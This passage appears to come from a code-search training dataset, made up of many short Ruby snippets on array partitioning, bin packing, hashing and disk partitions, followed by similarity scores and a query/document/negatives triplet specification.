"def greedy1_initial_alt!(remaining_partitions)\n\n virtual_remaining_partitions = DeepClone.clone remaining_partitions\n\n total_sites_remaining = remaining_partitions.total_sites\n total_free_space = self.total_free_space\n\n # Fill each bin starting with the least filled\n self.each_with_index do |bin, bin_index|\n\n # How many sites need to go into the current virtual bin\n sites_for_bin = ((@operations_lower_bound - bin.size).to_f / total_free_space * total_sites_remaining).ceil\n\n # Get partitions that need to go into the current virtual bin\n dropped_partitions = virtual_remaining_partitions.drop_sites!(sites_for_bin, compute = false)\n\n dropped_partitions.each do |partition|\n # Get site in the middle of partition\n mid_site = partition.sites[partition.sites.size / 2]\n\n # Actual assignment of site\n dropped_partition = remaining_partitions.list[partition.name].drop_specific_site!(mid_site)\n bin.add!([dropped_partition])\n end\n end\n\n remaining_partitions\n end",
"def slice_fill!(remaining_partitions)\n # Total number of sites that need to be distributed\n total_sites_remaining = remaining_partitions.total_sites\n total_free_space = self.total_free_space\n\n # Fill each bin starting with the least filled\n self.each do |bin|\n\n # How many sites need to go into the current bin\n number_of_sites = ((@operations_lower_bound - bin.size).to_f / total_free_space * total_sites_remaining).ceil # FIXME: It's probably better to round down and save overflow in last bin\n\n # Fill \"number_of_sites\" sites taken from \"remaining_partitions\" into the bin. The rest stays in \"remaining_partitions\"\n dropped_partitions = remaining_partitions.drop_sites!(number_of_sites)\n bin.add!(dropped_partitions)\n end\n end",
"def partition(collection, pivot)\n index = 0\n\n while index < pivot\n if collection[index] > collection[pivot]\n temp = collection[index]\n collection = shift(index, pivot, collection)\n collection[pivot] = temp\n pivot -= 1\n next\n end\n index += 1\n end\nend",
"def remainder_hash!(hash, *keys)\n keys = gather_keys(*keys)\n hash = normalize_hash(hash) unless hash.class == ::Hash\n hash.slice!(*keys)\n end",
"def randomized_partition(arr, p, r, ord)\n\ti = rand(p...r)\n\ttemp = arr[i]\n\tarr[i] = arr[r]\n\tarr[r] = temp\n\tpartition(arr, p, r, ord)\nend",
"def divmod(p0) end",
"def partition(array, p, r)\n q = p\n (p .. r - 1).each do |u|\n if array[u] <= array[r]\n array[q], array[u] = array[u], array[q]\n q += 1\n end\n end\n array[q], array[r] = array[r], array[q]\n q\nend",
"def original_scheduling_initial!(partitions)\n # Phase 1: Sort partitions by sites.size\n partitions.sort_by_sites!\n\n # Phase 2: Initial filling\n bin_assigner = 0\n full_bins = 0\n partitions.size.times do\n if @list[bin_assigner].total_sites + partitions.first.sites.size <= @sites_lower_bound\n @list[bin_assigner].add!([partitions.first])\n partitions.drop!(1)\n\n # Edge case handling for perfect fit\n if @list[bin_assigner].total_sites == @sites_lower_bound\n full_bins += 1\n @sites_lower_bound -= 1 if full_bins == @list.size - @sites_rounding_adjustment\n end\n\n else\n break\n end\n\n bin_assigner = (bin_assigner + 1) % @list.size\n end\n partitions\n end",
"def partition(arr, left, right)\r\n pivot = arr[right]['id']\r\n brk_pt = left\r\n\r\n (left..right-1).each do |i|\r\n if arr[i]['id'] < pivot\r\n arr[i], arr[brk_pt] = arr[brk_pt], arr[i]\r\n brk_pt = brk_pt + 1\r\n end\r\n end\r\n\r\n arr[brk_pt], arr[right] = arr[right], arr[brk_pt]\r\n return brk_pt\r\nend",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def remainder(p0) end",
"def partition(a, p, r)\n\n\t# assume last position\n\tpivot = a[r]\n\ti = p-1\n\tp.upto(r-1) do |j|\n\t\tif a[j] <= pivot\n\t\t\ti+=1\n\t\t\ta[i], a[j] = a[j], a[i]\n\t\tend \n\tend\n\ta[i+1],a[r] = a[r],a[i+1]\n i+1\nend",
"def partition_list()\nend",
"def partitioned_state\n super\n end",
"def assign_parts(hash={})\n return if hash.nil? or hash == {}\n self.parts = []\n hash ||= {}\n hash.each do |h|\n i = self.vendor.items.visible.find_by_sku(h[:sku])\n if i then\n i.is_part = true\n i.part_quantity = self.string_to_float(h[:part_quantity])\n result = i.save\n if result == false\n raise \"Could not save Item because #{ i.errors.messages }\"\n end\n self.parts << i\n end\n end\n result = self.save\n if result == false\n raise \"Could not save Item because #{ self.errors.messages }\"\n end\n end",
"def modulus(v)\n @modulus = v\n end",
"def add data, offset\n next_frag = 0\n $LOG.debug \"Setting partition at offset \" + offset.to_s + \" To \" + data\n len = data.length\n\n # can we fit it in??\n # lets say no. so we have to create a ????? and use that as\n # an enumerator\n #\n\n \n\n dary = [data].pack(\"a*\").unpack(\"C*\")\n @part[offset, dary.length] = dary\n\n @part[(offset + dary.length), 2] = [next_frag].pack(\"n\").unpack(\"C2\")\n \n @rem -= (dary.length + FileSystem::get_link_size)\n end",
"def set(partition, field, value)\n partition = deep_copy(partition)\n value = deep_copy(value)\n AutoinstCommon.set(@fields, partition, field, value)\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end",
"def partition_used(partition)\n # Return magic number if in test_mode to prevent syscall\n return '128' if @test_mode\n b = ' ' * 128\n syscall(137, partition, b)\n a = b.unpack('QQQQQ')\n [a[2] * blocks_per_kilobyte, a[4] * blocks_per_kilobyte]\n end",
"def partition_selector\n @subhash = {}\n @filters = {}\n\n partition_selector_hash @selector, []\n end",
"def partition(arr, left, right)\n pivot = arr[right]\n pindex = left\n for i in (left...right) do\n if(arr[i] <= pivot)\n arr[pindex], arr[i] = arr[i], arr[pindex]\n pindex += 1\n end\n end\n arr[pindex], arr[right] = arr[right], arr[pindex]\n pindex\nend",
"def cut_fill!(remaining_partitions)\n # Fill each bin starting with the least filled\n self.each do |bin|\n break if remaining_partitions.empty? # End if all remaining partitions have been distributed already\n\n # Total number of operations that need to go into this bin\n total_operations_remaining = remaining_partitions.op_optimized_size\n total_free_space = self.total_free_space\n\n # How many operations need to go into the current bin\n operations_for_bin = [((@operations_lower_bound - bin.size).to_f / total_free_space * total_operations_remaining).ceil,\n @operations_lower_bound - bin.size].max\n\n # Fill sites that add up to \"operations_for_bin\" taken from \"remaining_partitions\" into the bin.\n # The rest stays in \"remaining_partitions\".\n dropped_partitions = remaining_partitions.drop_operations!(operations_for_bin)\n bin.add!(dropped_partitions)\n end\n end",
"def update!(**args)\n @end_cursor = args[:end_cursor] if args.key?(:end_cursor)\n @partition = args[:partition] if args.key?(:partition)\n @start_cursor = args[:start_cursor] if args.key?(:start_cursor)\n end",
"def modulo(p0) end",
"def rehash(growth_multiple = DEFAULT_GROWTH_MULTIPLE)\n puts \"Rehashing\"\n new_size = (table.length * growth_multiple).to_i\n @table = table.each_with_object(HashTable.new(new_size)) do |value, result|\n result.insert(value) unless value == TOMBSTONE_MARKER\n end.dump_table\n end",
"def calc_poss_partitions(root_partition, rd, md)\n root_partition = normalize_partition(root_partition)\n # puts \"root_partition = \" + root_partition.to_s\n r = rd[:r_num_cells].length\n poss_partitions = Array.new\n # poss_partitions.push(root_partition)\n xxs = create_r_arrays_from_partition(rd[:r_num_cells], root_partition)\n\n i_j_combinations = (0...xxs.length).to_a.combination(2).to_a\n i_j_combinations.each do |ij|\n xx_i_combinations = (1...xxs[ij[0]].length).flat_map{|size| xxs[ij[0]].combination(size).to_a}\n xx_j_combinations = (1...xxs[ij[1]].length).flat_map{|size| xxs[ij[1]].combination(size).to_a}\n xx_i_combinations.each do |xx_i_combination|\n xx_i_sum = xx_i_combination.inject(0, :+)\n xx_j_combinations.each do |xx_j_combination|\n xx_j_sum = xx_j_combination.inject(0, :+)\n # This part is horribly inefficient. I already know some ways\n # it could be improved, but I just want a proof of concept for\n # the time being, so maybe I'll come back and optimize later.\n if xx_i_sum == xx_j_sum\n new_partition = create_new_partition(root_partition, xx_i_combination, xx_j_combination)\n new_partition = normalize_partition(new_partition)\n # Originally, I had this part cut down the number of partitions it returned by\n # making it only return VALID partitions. Now that I'm essentially using this\n # as a method of EXPANDING from a given partition, I should allow it to return\n # invalid partitions, as they could still have valid children which would not\n # be reachable otherwise.\n # if (not poss_partitions.include? new_partition) and validate_partition(new_partition, rd, md)\n if not poss_partitions.include? new_partition\n poss_partitions.push(new_partition)\n # puts \"poss_partition[\" + (poss_partitions.length-1).to_s + \"] = \" + new_partition.to_s\n end\n end\n end\n end\n end\n return poss_partitions\nend",
"def problem_76\n return 100.partitions - 1\nend",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def partition( header, &block )\n data.partition( header, &block ).map { |d| dup.load( d ) }\n end",
"def adapted_scheduling_initial!(partitions)\n bin_index = 0\n full_bins = 0\n partitions.size.times do\n if @list[bin_index].size + partitions.first.size <= @operations_lower_bound\n @list[bin_index].add!([partitions.first])\n partitions.drop!(1)\n\n # Edge case handling for perfect fit\n if @list[bin_index].size == @operations_lower_bound\n full_bins += 1\n @operations_lower_bound -= 1 if full_bins == @list.size - @operations_rounding_adjustment\n end\n\n else\n break\n end\n\n bin_index = (bin_index + 1) % @list.size\n end\n @list = @list.sort\n\n partitions\n end",
"def greedy1_initial_alt3!(remaining_partitions)\n bin_index = 0\n virtual_size = 0\n remaining_partitions.each do |partition|\n average_site_size = partition.size / partition.sites.size\n z = 0\n while z < partition.sites.size && bin_index < @list.size\n # Number of sites of this partition to go in bin bin_index\n z_prime = [((@operations_lower_bound - @list[bin_index].size - virtual_size).to_f/average_site_size).ceil,\n partition.sites.size - z].min\n\n # Assign site to bin\n mid_site = partition.sites[z + z_prime / 2]\n dropped_partition = partition.drop_specific_site!(mid_site)\n @list[bin_index].add!([dropped_partition])\n\n # -1 because we dropped one site, so the index z is also -1\n z += z_prime - 1\n if z >= partition.sites.size\n virtual_size = z_prime * average_site_size - @operations_worst_case\n else\n virtual_size = 0\n bin_index += 1\n end\n end\n end\n remaining_partitions\n end",
"def move_random_partition(node, histogram)\n #pick a random partition\n partition = node[:partitions].sample \n raise \"failed to find partition\" unless partition\n move_partition_to_most_utilised_node_with_space_for_it(node, partition, histogram)\n end",
"def div_h_p_nr(a,b)\n p = 0\n\n @bits.times do\n if p < 0\n # (i-a) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii-a) p=p+b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p += b\n else\n # (i-b) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii-b) p=p-b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p -= b\n if (p < 0)\n# Tests pass if the following is uncommented\n# # (iv) restore p\n# p += b\n else\n # (iii) if p >= 0\n a |= 1\n end\n end\n end\n # FIXME - need a test case that exercises this last step\n if p < 0\n p += b\n end\n [lo(a),lo(p)]\n end",
"def partition_hash(hash, *keys)\n keys = gather_keys(*keys)\n hash = normalize_hash(hash)\n return (matched = hash.slice(*keys)), hash.except(*matched.keys)\n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
"def test_0260_partition\n @@log.debug \"test_0260_partition starts\" if @@log.debug?\n assert_respond_to(@list, :partition, \"test_0260_partition_respond\")\n # Basic partition\n ta = @list.partition {|obj| obj.ndata >= 3 }\n assert_equal(2, ta.size,\"test_0260_partition_basic_01\")\n # First array: block evaluated to true\n assert_equal([@aen, @bsb], ta[0], \"test_0260_partition_basic_02\")\n # Second array: block evaluated to false\n assert_equal([@cab, @dad], ta[1], \"test_0260_partition_basic_03\")\n # Check Enumerator or Enumerable::Enumerator return, no block given\n # This form not documented by the 1.8 Pickaxe.\n new_list = @list.partition\nif RUBY_VERSION >= \"1.9\"\n result = new_list.is_a? Enumerator\n assert(result, \"test_0260_partition_enumcheck\")\nelse\n # Note: the author's version of the 1.8 Pickaxe documents this\n # as an Array, however does not document this form of code at all.\n # YMMV.\n result = new_list.is_a? Enumerable::Enumerator\n assert(result, \"test_0260_partition_enumenumcheck\")\nend\n\n @@log.debug \"test_0260_partition ends\" if @@log.debug?\n end",
"def set_remainder\n @remainder = Remainder.find(params[:id])\n end",
"def partitions(key, partitions)\n master = fnv_hash(key) % partitions.size\n selected = [master]\n nodes = [partitions[master]]\n current = (master + 1) % partitions.size\n\n # Walk clockwise around the ring of partitions, starting from the master partition.\n # The next few unique nodes in ring order are the replicas.\n while current != master && selected.size < @replicas\n if !nodes.include? partitions[current]\n nodes << partitions[current]\n selected << current\n end\n current = (current + 1) % partitions.size\n end\n\n selected\n end",
"def partition(arr, start, e)\n pivot = arr[e - 1]\n p_index = i = start\n \n while i < e - 1\n if arr[i] < pivot\n arr[i], arr[p_index] = arr[p_index], arr[i]\n p_index += 1\n end\n i += 1\n end\n arr[p_index], arr[e - 1] = arr[e - 1], arr[p_index]\n p_index\nend",
"def update_hash\n nh = nil\n\n if is_branch != 0\n sha512 = OpenSSL::Digest::SHA512.new\n sha512 << HASH_+PREFIXES[:inner_node]\n hashes.each { |k,h|\n sha512 << v\n }\n nh = sha512.digest\n end\n\n return false if nh == self.hash\n self.hash = nh\n return true\n end",
"def block_by_hash(_hsh)\n raise NotImplementedError\n end",
"def partition(list, left, right)\n pivot = list[right]\n previous_left = left-1\n left.upto(right-1) { |value|\n previous_left = previous_left + 1 if list[value] <= pivot\n list[previous_left], list[value] = list[value], list[previous_left] if list[value] <= pivot\n }\n list[previous_left+1], list[right] = list[right], list[previous_left+1]\n return previous_left + 1\nend",
"def partition_lookup\n return @partition_lookup unless @partition_lookup.nil?\n io = _root._io\n _pos = io.pos\n io.seek(_root.sector_size)\n @_raw_partition_lookup = io.read_bytes(sector_size)\n _io__raw_partition_lookup = Kaitai::Struct::Stream.new(@_raw_partition_lookup)\n @partition_lookup = PartitionEntry.new(_io__raw_partition_lookup, self, @_root)\n io.seek(_pos)\n @partition_lookup\n end",
"def hash_values\n [@modulus, @remainder]\n end",
"def partition(array, low, high)\n middle = (high + low ) / 2\n pivot = array[middle] # choose middle element as pivot\n # SWAP MIDDLE TO END\n array[middle], array[high] = array[high], array[middle]\n\n pivot_index = high # store index of pivot\n i = low\n\n while i < pivot_index\n if array[i] <= pivot\n i += 1\n next\n end\n\n before_pivot = pivot_index - 1\n array[i], array[before_pivot] = array[before_pivot], array[i]\n pivot_index -= 1\n end\n # SWAP ONCE AT END OF LOOP TO PUT PIVOT IN CORRECT LOCATION\n array[pivot_index], array[high] = array[high], array[pivot_index]\n pivot_index\nend",
"def generate_partitioner(graph,partitioners,numReduceTask)\r\n \r\n puts\"--- PARTITIONER ---\" \r\n \r\n @Jobs.each do |current_job| \r\n \r\n if partitioners.size == 0\r\n return\r\n end\r\n \r\n numReduceTask_int = 1 # valore di default\r\n \r\n unless numReduceTask.size == 0\r\n numReduceTask.each do |inline|\r\n \r\n fields = inline.split('.')\r\n if current_job == fields[0] #se viene definito un setNumTask per qul job\r\n numReduceTask_int = fields[1].scan(/\\d+/)\r\n numReduceTask_int = numReduceTask_int.first.to_i\r\n else\r\n next\r\n end\r\n end \r\n \r\n if numReduceTask_int == 0 # viene imposto che non ci sará il reducer\r\n next # passo al prossimo ciclo di job\r\n end \r\n end \r\n\r\n fields = partitioners.first.split('.')\r\n \r\n # se il job da analizzare é uguale a quello corrente => lo lavoro\r\n if current_job == fields[0] \r\n partitioner_name = current_job + \".\" + \"PARTITIONER_\" + fields[1].split('(')[1]\r\n \r\n #aggiungo il nodo partitioner\r\n graph.add_node(partitioner_name,\"is_partitioner\")\r\n puts \"aggiunto partitioner:\" + partitioner_name\r\n \r\n # chiudo i nodi pendenti ( job per job) \r\n Close_ALL_pending_links(graph,current_job,partitioner_name)\r\n \r\n for i in(1..numReduceTask_int)\r\n @OpenLink.push(partitioner_name); \r\n end \r\n end \r\n end #do jobs\r\n \r\n end",
"def hashfunction(key, size)\n #key.hash % size\n key % size\n end",
"def set_partition_usage(host, partition, usage)\n self.client.set(\"gh.storage.server.usage.percent.#{host}.#{partition}\", usage.to_s)\n end",
"def dispatch_hashing!\n Thread::new do\n begin\n self.logger.debug { \"Starting hashset dispatcher.\" }\n \n data = true\n position = @options.offset * @options.blocksize\n \n if @options.blockcount\n target = position + @options.blockcount * @options.blocksize\n else\n target = nil\n end\n \n self.logger.info { \"Starting indexing for transfer.\" }\n \n while data and (target.nil? or position < target)\n self.file.acquire do |file|\n self.logger.debug { \"Reading block from position #{position}.\" }\n file.seek(position)\n data = file.read(@options.blocksize)\n end\n \n position += @options.blocksize\n @hash_queue << Digest::SHA1.hexdigest(data) if data\n end\n \n # indicates finish\n @hash_queue << :end\n \n self.logger.info { \"Indexing for transfer finished.\" }\n \n rescue Exception => e\n self.logger.fatal { \"#{e.class.name}: #{e.message}\\n #{e.backtrace.join(\"\\n\")}\" }\n end\n end\n end",
"def partition(node)\n\t\tnew_head = node\n\t\tnew_tail = node\n\t\tcurr_node = @head\n\t\twhile curr_node\n\t\t\tp curr_node.val \n\t\t\ttemp_next = curr_node.next_node #***\n\t\t\tif curr_node.val < node.val\n\t\t\t\tcurr_node.next_node = new_head\n\t\t\t\tnew_head = curr_node\n\t\t\telse\n\t\t\t\tnew_tail.next_node = curr_node\n\t\t\t\tnew_tail = curr_node\n\t\t\t\tcurr_node.next_node = nil\n\t\t\tend\n\t\t\tcurr_node = temp_next\n\t\tend\n\t\t@head = new_head\n\tend",
"def set_pie_piece_transaction_split\n @pie_piece_transaction_split = PiePieceTransactionSplit.find(params[:id])\n end",
"def partition1(arr, left, right)\n pele = arr[left]\n pindex = right\n i = right\n while(i > left)\n if(arr[i] > pele)\n arr[i], arr[pindex] = arr[pindex], arr[i]\n pindex -= 1\n end\n i -= 1\n end\n arr[left], arr[pindex] = arr[pindex], arr[left]\n pindex\nend",
"def create_partition_to_fill_disk(disk)\n # @disk.create_partition('primary', '100%')\n disk.create_partition_table # LinuxAdmin::Disk.create_partition has this already...\n AwesomeSpawn.run!(\"parted -s #{disk.path} mkpart primary 0% 100%\")\n\n # FIXME: Refetch the disk after creating the partition\n disk = LinuxAdmin::Disk.local.find { |d| d.path == disk.path }\n disk.partitions.first\n end",
"def modulo(other)\n self % other\n end",
"def partition_linked_list(linked_list, partition_value)\n test_node = linked_list.head.next\n until test_node.next.value == nil\n if test_node.value < partition_value\n next_node = test_node.next\n linked_list.prepend(test_node.value)\n linked_list.remove(test_node)\n test_node = next_node\n else\n test_node = test_node.next\n end\n end\n linked_list\nend",
"def add_partition_to_all_lowest( tp, nb_partitions_to_add )\n\n nodes_sizes_replicas = @nodes_lists_replicas.hmap { |k,v| { k => v.size } }\n nodes_lowest = nodes_sizes_replicas.sort_by{|k,v| v}.map { |a| a[0] }\n\n nodes_lowest.each do |node|\n break if nb_partitions_to_add <= 0\n\n unless @nodes_lists_replicas[node].has_key?(tp)\n add_partition_to_node( tp, node )\n nb_partitions_to_add -= 1\n end\n end\n end",
"def partition(array, left, right)\n pivot = right\n right -= 1\n puts \"left: #{left}, right: #{right}\"\n while true do\n while array[left] <= array[pivot] && left < pivot do\n left += 1\n end\n\n while array[right] > array[pivot] do\n right -= 1\n end\n\n\n\n if left >= right\n temp = array[left]\n array[left] = array[pivot]\n array[pivot] = temp\n break\n else\n temp = array[left]\n array[left] = array[right]\n array[right] = temp\n end\n end\n\n\n left\nend",
"def partitionx(array, start, fin, pivot_index)\n le_count = 0\n pivot_value = array[pivot_index]\n puts \"Partitioning for value: #{pivot_value}: #{array}\"\n puts \"Start:Fin #{start}:: #{fin}:: #{pivot_index}\"\n array[start..fin].each do |element|\n le_count += 1 if element <= pivot_value\n end\n\n new_array = []\n puts \"LE count: #{le_count}\"\n new_array[le_count - 1] = pivot_value\n left_index = 0 # 5\n right_index = le_count # 1\n index = start\n array[start..fin].each do |element|\n puts \"Element: #{element}: #{index}:: #{pivot_index}\"\n if index == pivot_index\n index += 1\n next\n end\n\n if element <= pivot_value\n puts \"Copying to left #{element} to #{left_index}\"\n new_array[left_index] = element\n left_index += 1\n else\n puts \"Copying #{element} to #{right_index}\"\n new_array[right_index] = element\n right_index += 1\n end\n end\n puts \"before replacing: #{array} : #{array[start..fin]}:: #{new_array}\"\n j = 0\n (start..fin).each do |index|\n puts \"index: #{index}\"\n array[index] = new_array[j]\n j += 1\n end\n\n puts \"New array: #{array}\"\n puts \"new pivot index: #{array.index(pivot_value)}\"\n array.index(pivot_value)\n end",
"def remainder(val); end",
"def greedy1_fill!(remaining_partitions)\n remaining_partitions.each do |src_partition|\n # Test each site ...\n src_partition.sites.each do |site|\n\n simulation_result_below_bound = {}\n simulation_result_above_bound = {}\n # ... in each bin ...\n self.each_with_index do |bin, bin_index|\n target_partition = bin.list[src_partition.name]\n if target_partition.nil?\n # Creating a new partition is more costly than the worst case\n operations = @operations_worst_case + 1\n else\n # Simulate insertion of site into existing partition of current bin\n operations = target_partition.incr_add_sites!([site], simulate = true)\n end\n # Check if bin.size is smaller than lower_bound. Save simulation_result accordingly to prefer addition below lower_bound.\n if bin.update_size!.size < @operations_lower_bound\n simulation_result_below_bound.merge!({operations => bin_index})\n else\n simulation_result_above_bound.merge!({operations => bin_index})\n end\n\n end\n\n # Insert at lowest operation cost\n best = if simulation_result_below_bound.empty?\n simulation_result_above_bound.min_by { |operations, bin_index| operations }\n else\n simulation_result_below_bound.min_by { |operations, bin_index| operations }\n end\n target_partition = @list[best[1]].list[src_partition.name]\n if target_partition.nil?\n @list[best[1]].add!([Partition.new(src_partition.name, [site], src_partition.tree)])\n else\n target_partition.incr_add_sites!([site])\n end\n\n end\n end\n end",
"def shared_slice(hash_)\n offset_ = @offset\n select_set_ = {}\n hash_.each do |k_, v_|\n if (ainfo_ = @structure.axis(k_))\n aindex_ = ainfo_.axis_index\n unless select_set_.include?(aindex_)\n lindex_ = ainfo_.index(v_)\n if lindex_\n offset_ += ainfo_.step * lindex_\n select_set_[aindex_] = true\n end\n end\n end\n end\n Table.new(@structure.substructure_omitting(select_set_.keys),\n :acquire => @vals, :offset => offset_, :parent => self)\n end",
"def rehash\n capacity = @capacity\n entries = @entries\n\n @entries = Entries.new @capacity\n\n i = -1\n while (i += 1) < capacity\n next unless old = entries[i]\n while old\n old.next = nil if nxt = old.next\n\n index = key_index(old.key_hash = old.key.hash)\n if entry = @entries[index]\n old.next = entry\n end\n @entries[index] = old\n\n old = nxt\n end\n end\n\n self\n end",
"def div_h_p_r(a,b)\n p = 0\n\n @bits.times do\n # (i) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii) p=p-b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p -= b\n if (p < 0)\n # (iv) restore p\n p += b\n else\n # (iii) if p >= 0\n a |= 1\n end\n end\n [lo(a),lo(p)]\n end",
"def rehash\n buckets.compact.each do |key, value|\n insert(key, value)\n end\n end",
"def update_slots(hash)\n hash.each do |k, v|\n self[k] = v\n end\n\n self\n end",
"def is_divisible_using_hashing(arr, k)\n n = arr.length\n hsh = {}\n # collect reminders and their occurences\n for i in 0...n\n if hsh[arr[i] % k]\n hsh[arr[i] % k] += 1\n else\n hsh[arr[i] % k] = 1 \n end \n end\n\n # traverse array again to check reminders with following possiblities\n # 1. if reminder is 0, then its occurence must be > 1\n # 2. if reminder divides k in two halves, then its occurence must be > 1\n # 3. if reminder occurence is same as k - reminder occurence\n\n for i in 0...n\n rem = arr[i] % k\n if rem * 2 == k || rem == 0\n if hsh[rem] == 1\n return false\n end \n else\n if hsh[rem] != hsh[k-rem]\n return false\n end \n end \n end \n true\nend",
"def rekey_as_needed; end",
"def hsub!(hash)\n self.class.hsub(self, hash)\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def divmod(val); end",
"def change(hash); end",
"def update!(**args)\n @next_page_token = args[:next_page_token] if args.key?(:next_page_token)\n @partitions = args[:partitions] if args.key?(:partitions)\n end",
"def testReorderingChangingCrossPartition\n executeSimpleTest(\n [ [ 'T1', 'R1', 900, 5, ['T2'], '==== ='],\n [ 'T2', 'R2', 800, 2, [], ' =='],\n [ 'T3', 'R2', 700, 2, ['T4'], ' =='],\n [ 'T4', 'R1', 600, 2, ['T5'], ' =='],\n [ 'T5', 'R3', 1000, 2, [], ' =='],\n [ 'T6', 'R4', 100, 5, ['T5'], '====='],\n [ 'T7', 'R2', 200, 2, ['T8'], '=='],\n [ 'T8', 'R5', 2000, 2, [], ' =='],\n [ 'T9', 'R6', 300, 3, ['T8'], '==='] ] )\n end",
"def set_composite_key(&block)\n if persisted? && key_field_changed?\n swap_composite_keys(&block)\n else\n identify and block.call\n end\n end"
] |
[
"0.65524477",
"0.62586033",
"0.56729954",
"0.5489327",
"0.54774976",
"0.5430847",
"0.5423311",
"0.54208827",
"0.5387516",
"0.53596234",
"0.5349726",
"0.5324894",
"0.53132087",
"0.5308499",
"0.52947605",
"0.5264948",
"0.52567273",
"0.52390057",
"0.52349293",
"0.522618",
"0.5206389",
"0.5179654",
"0.5155142",
"0.51543117",
"0.51538557",
"0.51469105",
"0.5127821",
"0.5115603",
"0.5111907",
"0.5107685",
"0.5089773",
"0.5089735",
"0.5087324",
"0.5082239",
"0.50813675",
"0.50785977",
"0.5076999",
"0.5044362",
"0.50417894",
"0.5037564",
"0.5021555",
"0.5020975",
"0.50136596",
"0.50114393",
"0.49926487",
"0.49896836",
"0.49797583",
"0.49721894",
"0.49692717",
"0.4966803",
"0.49634182",
"0.49550948",
"0.49532104",
"0.4935253",
"0.49273884",
"0.4920946",
"0.49158034",
"0.48978424",
"0.48944047",
"0.4880884",
"0.48782203",
"0.4873882",
"0.48669997",
"0.48623326",
"0.48444813",
"0.48423117",
"0.48294538",
"0.48282343",
"0.48115903",
"0.48083386",
"0.48056707",
"0.4794157",
"0.47854766",
"0.47794208",
"0.47717014",
"0.47678304",
"0.47661564",
"0.47628614",
"0.47620118",
"0.4759223",
"0.47557938",
"0.47458",
"0.4741385",
"0.47354048",
"0.47345203",
"0.47323063",
"0.4727006",
"0.47249272",
"0.47173205",
"0.47125414",
"0.47106403",
"0.47100732",
"0.47071335",
"0.4699888",
"0.46962962",
"0.4695913",
"0.4692997",
"0.46871272",
"0.46808907",
"0.46808586"
] |
0.5119667
|
27
|
Sets that this is a default partition, where values not in other partitions are stored.
|
def default
@default = true
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def set_default_cluster\n if study.default_options[:cluster].nil?\n cluster = study.cluster_groups.by_name(cluster_name_by_file_type)\n study.default_options[:cluster] = cluster.name if cluster.present?\n end\n end",
"def reset_default_cluster(study:)\n if study.cluster_groups.by_name(study.default_options[:cluster]).nil?\n study.default_options[:cluster] = nil\n study.save\n end\n end",
"def set_default_values\n self.synced_with_gram = false\n end",
"def set_default_values\n self.synced_with_gram = false\n end",
"def set_default\n end",
"def set_defaults\n unless persisted?\n end\n end",
"def default_slot (slot_num)\r\n @default_slot = slot_num\r\n end",
"def set_conf_default(conf)\n end",
"def set_conf_default(conf)\n end",
"def default_values\n self.trash ||= false\n end",
"def set_study_default_options\n @default_cluster = @study.default_cluster\n @default_cluster_annotations = {\n 'Study Wide' => @study.viewable_metadata.map {|metadata| metadata.annotation_select_option }\n }\n unless @default_cluster.nil?\n @default_cluster_annotations['Cluster-based'] = @default_cluster.cell_annotations\n .keep_if {|annot| @default_cluster.can_visualize_cell_annotation?(annot)}\n .map {|annot| @default_cluster.formatted_cell_annotation(annot)}\n end\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def default\n igetset(:default) { nil }\n end",
"def default=(val)\n self['default'] = val\n end",
"def default_cluster\n default = self.cluster_groups.first\n unless self.default_options[:cluster].nil?\n new_default = self.cluster_groups.by_name(self.default_options[:cluster])\n unless new_default.nil?\n default = new_default\n end\n end\n default\n end",
"def set_study_default_options\n @default_cluster = @study.default_cluster\n @default_cluster_annotations = {\n 'Study Wide' => @study.cell_metadata.map {|metadata| [\"#{metadata.name}\", \"#{metadata.name}--#{metadata.annotation_type}--study\"] }.uniq\n }\n unless @default_cluster.nil?\n @default_cluster_annotations['Cluster-based'] = @default_cluster.cell_annotations.map {|annot| [\"#{annot[:name]}\", \"#{annot[:name]}--#{annot[:type]}--cluster\"]}\n end\n end",
"def set_default(value)\r\n\t\t\tself.default_value = value\r\n\t\tend",
"def create_partition_to_fill_disk(disk)\n # @disk.create_partition('primary', '100%')\n disk.create_partition_table # LinuxAdmin::Disk.create_partition has this already...\n AwesomeSpawn.run!(\"parted -s #{disk.path} mkpart primary 0% 100%\")\n\n # FIXME: Refetch the disk after creating the partition\n disk = LinuxAdmin::Disk.local.find { |d| d.path == disk.path }\n disk.partitions.first\n end",
"def set_default_item_location\n \tself.actual_storage_location = self.item.storage_location\n end",
